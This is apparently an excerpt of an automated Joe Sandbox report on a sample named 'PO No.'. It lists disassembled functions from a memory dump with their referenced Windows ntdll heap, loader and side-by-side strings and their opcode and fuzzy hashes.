                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                          • API String ID: 0-3591852110
                                                          • Opcode ID: 75b91e36dc7555d8861ab10cb31c5134f747006c72bfc28727a5b316bc2cc8ed
                                                          • Instruction ID: 1ee2fbe7386664a5a410ae6b1a481af500282455e85a3e9e68376f7be2744765
                                                          • Opcode Fuzzy Hash: 75b91e36dc7555d8861ab10cb31c5134f747006c72bfc28727a5b316bc2cc8ed
                                                          • Instruction Fuzzy Hash: 8F128C31600A46DFE726CF29C485BBABBE1FF49714F18885DE6968F681D734E881CB50
                                                          Function 0155AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-3197712848
                                                          • Opcode ID: c647a96f38b107b55cb5f69cc47c7b1deb2e43dfff5b0f1d2cf64fc9a2dc084a
                                                          • Instruction ID: 302ca5994a2c7b18fdc8243f284cc6e9fe7862b1c2a8e250aa4f848c54a0648c
                                                          • Opcode Fuzzy Hash: c647a96f38b107b55cb5f69cc47c7b1deb2e43dfff5b0f1d2cf64fc9a2dc084a
                                                          • Instruction Fuzzy Hash: 9A12DF716083429FD365DB28C8A0BAEB7E5BF84704F440A1EFD958F291E774D944CBA2
                                                          Function 0153D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                          • API String ID: 0-3532704233
                                                          • Opcode ID: 23b1b51b60dc07995a31dec0642d8eef34abee868f388bc29073f706736c2a67
                                                          • Instruction ID: 6e471b7f70c6744cda466200504cd43e485b0e7fe50e4848fc9da09d868c8ef5
                                                          • Opcode Fuzzy Hash: 23b1b51b60dc07995a31dec0642d8eef34abee868f388bc29073f706736c2a67
                                                          • Instruction Fuzzy Hash: 23B18B725083569FDB22DE68C440A6FBBF8BBC8754F41492EF999DB240D770D904CBA2
                                                          Function 015F0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                          • API String ID: 0-1357697941
                                                          • Opcode ID: 8c6d94c2dede683a60b2e294bb61acb87e119fc5454f442540f95b28fe8a1835
                                                          • Instruction ID: 519382aeea2cd037d1ff3eaaae48cce444218fc3f2efd7fbe287ddda83dfee41
                                                          • Opcode Fuzzy Hash: 8c6d94c2dede683a60b2e294bb61acb87e119fc5454f442540f95b28fe8a1835
                                                          • Instruction Fuzzy Hash: CAF1F431A00686EFDB25CF68C481BAABBF6FF49714F08845DE6919F282D730E945CB50
                                                          Function 015F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: a9507dfeeefcf7e9e0e64ebce7d8ab6fc6f80c205e2069b9de75e0e9791faea2
                                                          • Instruction ID: a6353f760225cefd5967fd9e58900b636a1eb66675a56ef7e0ef6422c84ad2d6
                                                          • Opcode Fuzzy Hash: a9507dfeeefcf7e9e0e64ebce7d8ab6fc6f80c205e2069b9de75e0e9791faea2
                                                          • Instruction Fuzzy Hash: D4D1AB36A00686DFDB22DF68C845AADBBF2FF8A610F08805DF6459F292D774D941CB10
                                                          Function 015C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015C8A67
                                                          • VerifierDebug, xrefs: 015C8CA5
                                                          • VerifierFlags, xrefs: 015C8C50
                                                          • VerifierDlls, xrefs: 015C8CBD
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015C8A3D
                                                          • HandleTraces, xrefs: 015C8C8F
                                                          • AVRF: -*- final list of providers -*- , xrefs: 015C8B8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: dce5f57175438e2acbe5f07d6cfc2c1c83fae0b8fcf1bd22a2ea5fe6206babd2
                                                          • Instruction ID: c710c62f526b4703d982744888297c5650d1696f5f347fb8d0ae09c6b8414161
                                                          • Opcode Fuzzy Hash: dce5f57175438e2acbe5f07d6cfc2c1c83fae0b8fcf1bd22a2ea5fe6206babd2
                                                          • Instruction Fuzzy Hash: 269122B2645712AFD321DFA8DC80B6A7BE8BB94F14F45485DFA426F240C770AC01CB91
                                                          Function 0154EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          • Opcode ID: 1f3a0f39792d02accfb5a6ff6c606c03939777db1c29ed4159354ed2c3a20dae
                                                          • Instruction ID: 7f149419ddbd42e272bd29176db8f76d80f39ad3bd1b0c6931f671f0cb7f71c6
                                                          • Opcode Fuzzy Hash: 1f3a0f39792d02accfb5a6ff6c606c03939777db1c29ed4159354ed2c3a20dae
                                                          • Instruction Fuzzy Hash: EAA22974A0562A8FDB64DF58CC887ADBBB5BF85304F5442EAD90DAB250DB749E81CF00
                                                          Function 0153F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-523794902
                                                          • Opcode ID: 9e75d30dbcf2bc71bd9058614a0fbda63ec3fbb723193dd6cb4ab866872aaf62
                                                          • Instruction ID: 69ce74d63d0a8cd9bd912cf9c10ecdffab48a494bf1e2099ff843efc65a4aba1
                                                          • Opcode Fuzzy Hash: 9e75d30dbcf2bc71bd9058614a0fbda63ec3fbb723193dd6cb4ab866872aaf62
                                                          • Instruction Fuzzy Hash: 0D42BD716047829FDB15CF28C894A6ABBE5FFC4604F08496EF9968F391D734E841CB52
                                                          Function 0154ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                          • API String ID: 0-4098886588
                                                          • Opcode ID: 9858a852fb776e83a883195f437a384c716d5669fcf1a462683e53a72551fb04
                                                          • Instruction ID: 1eff2d77b81df1ab338296bec275c83b3ddf1ca6ce4ec7da7aabe9be1cb4cda3
                                                          • Opcode Fuzzy Hash: 9858a852fb776e83a883195f437a384c716d5669fcf1a462683e53a72551fb04
                                                          • Instruction Fuzzy Hash: DE32B3709442698BDF62CF18C898BEEBBB5BF45348F1441EAE849AF251D7319E81CF50
                                                          Function 0155B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-122214566
                                                          • Opcode ID: a5c6610407ba405ce2e88cbfcf8e9208a42d9417ad1ba1c50e869969f6b11a28
                                                          • Instruction ID: 2ac98903b49a1163e8e89942faff1a8e4db158ee5d36e04c473e3c0122a0d546
                                                          • Opcode Fuzzy Hash: a5c6610407ba405ce2e88cbfcf8e9208a42d9417ad1ba1c50e869969f6b11a28
                                                          • Instruction Fuzzy Hash: 43C16B71A002169BDB658F68CCA5B7EBBB6BF85304F15406BED02AF291E774CD44C3A1
                                                          Function 015763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: 36f21419d519315c52816ad91b19114b2dd51503a276574adf30872350c1437e
                                                          • Instruction ID: 6eb83852f877361fbcb4d63f9463dde39bb292e1cde203273b0acbbbf867f3f6
                                                          • Opcode Fuzzy Hash: 36f21419d519315c52816ad91b19114b2dd51503a276574adf30872350c1437e
                                                          • Instruction Fuzzy Hash: 8F910771A007569BEB35DF58ECCABAE7BA2FB81B14F140129D9026F282D7B49801C795
                                                          Function 0153645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • apphelp.dll, xrefs: 01536496
                                                          • Getting the shim user exports failed with status 0x%08lx, xrefs: 01599A01
                                                          • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 015999ED
                                                          • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01599A2A
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01599A11, 01599A3A
                                                          • LdrpInitShimEngine, xrefs: 015999F4, 01599A07, 01599A30
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          • Opcode ID: 502b9a89ca120a0aa5e2ae51520715a9367219173e3b79444c5ca1d6d82c6c41
                                                          • Instruction ID: 030eb6b5b028b57000bdd35a900efc14b5b021d18f05791614515f181c14b94c
                                                          • Opcode Fuzzy Hash: 502b9a89ca120a0aa5e2ae51520715a9367219173e3b79444c5ca1d6d82c6c41
                                                          • Instruction Fuzzy Hash: 4851AF71608306AFEB21DB24DC51AAB77E8FBC4748F44091DE5859F290D7B4EA44CB93
                                                          Function 01572674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015B219F
                                                          • RtlGetAssemblyStorageRoot, xrefs: 015B2160, 015B219A, 015B21BA
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015B2178
                                                          • SXS: %s() passed the empty activation context, xrefs: 015B2165
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015B21BF
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015B2180
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: a8849ae07ecc2065ffe402046712e71e085a0a65faf2a155aaef86a32c273cb4
                                                          • Instruction ID: 17c059e7fe06f47b6ef831716507000c2531e4d0220ee7dcd9922c50f66c3e12
                                                          • Opcode Fuzzy Hash: a8849ae07ecc2065ffe402046712e71e085a0a65faf2a155aaef86a32c273cb4
                                                          • Instruction Fuzzy Hash: FA31EB36B402257BF711CA959C86F9EBAB9FBA5A50F054059F604AF141D270AA01C6B1
                                                          Function 0157C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializeImportRedirection, xrefs: 015B8177, 015B81EB
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 015B8181, 015B81F5
                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 015B81E5
                                                          • Loading import redirection DLL: '%wZ', xrefs: 015B8170
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0157C6C3
                                                          • LdrpInitializeProcess, xrefs: 0157C6C4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-475462383
                                                          • Opcode ID: 2f5051566b42709d0e4ae49a819df7791e2131c6aa3567956837ddc63e54e26c
                                                          • Instruction ID: b77588383a69dfdd61586abdc13deba848824af1a2e6700a821347bb955fa885
                                                          • Opcode Fuzzy Hash: 2f5051566b42709d0e4ae49a819df7791e2131c6aa3567956837ddc63e54e26c
                                                          • Instruction Fuzzy Hash: 7D31C071644713ABD224EA68DD86E6AB7A8FFD5A10F040518F945AF291E660EC04C7A2
                                                          Function 01559950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                          • API String ID: 0-3393094623
                                                          • Opcode ID: e3db0b7c94f49c7736431189c1323295b409ba58929d3db6281a1c9cf81e7518
                                                          • Instruction ID: 34f4098fa016037fd0c022ebbcf8aa92c014b83bb598a9423e128b0b9f88f522
                                                          • Opcode Fuzzy Hash: e3db0b7c94f49c7736431189c1323295b409ba58929d3db6281a1c9cf81e7518
                                                          • Instruction Fuzzy Hash: E8023871508382CFD761CF68C19076FBBE5BF89718F44491EED898B250E778D8448B92
                                                          Function 0158096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 01582DF0: LdrInitializeThunk.NTDLL ref: 01582DFA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580BA3
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580BB6
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580D74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: 9eba31408ce84d6b41a5fe1dad4238d756ff784333349b0f3e994665a1002baf
                                                          • Instruction ID: d63422705538a069b6dc6b52a29719287bcb96083a11a9ac89431355f1c44f92
                                                          • Opcode Fuzzy Hash: 9eba31408ce84d6b41a5fe1dad4238d756ff784333349b0f3e994665a1002baf
                                                          • Instruction Fuzzy Hash: E9426BB1900716DFDB61DF28C880BAABBF4BF44314F1445A9E989EB281D770A985CF60
                                                          Function 015C4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                          • API String ID: 0-2518169356
                                                          • Opcode ID: 6b791ac62e5ff817ac8b3ad6fa2c7d5140285eb273ad5c73d6b94ab3b8fd22c2
                                                          • Instruction ID: aae86991ac8727122d7c554fadbde88978f3ae57e6590caf19f22f035d673f25
                                                          • Opcode Fuzzy Hash: 6b791ac62e5ff817ac8b3ad6fa2c7d5140285eb273ad5c73d6b94ab3b8fd22c2
                                                          • Instruction Fuzzy Hash: F1919E72A1061A8FCB21CFDCC885AAEB7B0FF88710B594169E951EB350E775E901CB90
                                                          Function 015570C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 873565cc93fe697d94bb71984306bfe4a339940803efd1453b954078545f43a2
                                                          • Instruction ID: 6d8982bf0d340fde8675ec4bacfd0fb5b86c365c5f93e9cab854d8157d3fee39
                                                          • Opcode Fuzzy Hash: 873565cc93fe697d94bb71984306bfe4a339940803efd1453b954078545f43a2
                                                          • Instruction Fuzzy Hash: 4813AC70A00656CFDB65CF69C8A07ADBBF1FF48304F1485AAD949AF381D734A945CB90
                                                          Function 0155A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 015A7D03
                                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 015A7D39
                                                          • SsHd, xrefs: 0155A885
                                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 015A7D56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                          • API String ID: 0-2905229100
                                                          • Opcode ID: aa55d7a259ef0830089090ee9fd6e2c28b3b05344926baad4dc6d797a780b6d9
                                                          • Instruction ID: 2359732351f63e3341f4d215a940313d751b3afb8f944698406a89dd3210baf5
                                                          • Opcode Fuzzy Hash: aa55d7a259ef0830089090ee9fd6e2c28b3b05344926baad4dc6d797a780b6d9
                                                          • Instruction Fuzzy Hash: 22D19E35A0021ADBDB25CFA8D8D06ADBBF5FF48310F19416AED45AF341E3719981CBA1
                                                          Function 0154A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: c82e5e1a1022c85d22e2fdc03c9f439f92b9e463c43976d90e33dda2dc0177ee
                                                          • Instruction ID: 5726c4c9ee12a8cc55e42775e5d2d08ab17f66892dfca45fe34c8260faa78892
                                                          • Opcode Fuzzy Hash: c82e5e1a1022c85d22e2fdc03c9f439f92b9e463c43976d90e33dda2dc0177ee
                                                          • Instruction Fuzzy Hash: 37C189755483828FD761CF58C144BAEB7E4FF84708F04896AF9968F251E734C949CBA2
                                                          Function 01578402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0157855E
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01578421
                                                          • @, xrefs: 01578591
                                                          • LdrpInitializeProcess, xrefs: 01578422
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: 5e45a2f160e5f7d5ef71c8979c97c7afe3a916dadbb0ab5d95d916f11ce6034c
                                                          • Instruction ID: 18c8193df96355495370e920e45161e9d32dc85d72712858e268e7ff0be21f18
                                                          • Opcode Fuzzy Hash: 5e45a2f160e5f7d5ef71c8979c97c7afe3a916dadbb0ab5d95d916f11ce6034c
                                                          • Instruction Fuzzy Hash: 53918D71518346AFD722EF25DC85EAFBAECBF84744F40092EFA849A151E770D904CB62
                                                          Function 01550C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: , xrefs: 015A54E0, 015A55A1
                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 015A55AE
                                                          • HEAP[%wZ]: , xrefs: 015A54D1, 015A5592
                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 015A54ED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1510000_PO No.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                          • API String ID: 0-1657114761
                                                          • Opcode ID: f8b2fa108adacf32f2162cd9cd2614cbcb370739a0fce2243d63f489c730bed1
                                                          • Instruction ID: 064b788cfef1ded92760b26c196661106d36db7798f0bf9aa724863134ed5307
                                                          • Opcode Fuzzy Hash: f8b2fa108adacf32f2162cd9cd2614cbcb370739a0fce2243d63f489c730bed1
                                                          • Instruction Fuzzy Hash: C4A1D2306007069FD765CF28C861BBEFBE1BF55300F14856AE9968F682E730E845C791
                                                          Function 0157273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • .Local, xrefs: 015728D8
                                                          • SXS: %s() passed the empty activation context, xrefs: 015B21DE
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015B21D9, 015B22B1
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015B22B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2514194264.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                          Joe Sandbox IDA Plugin
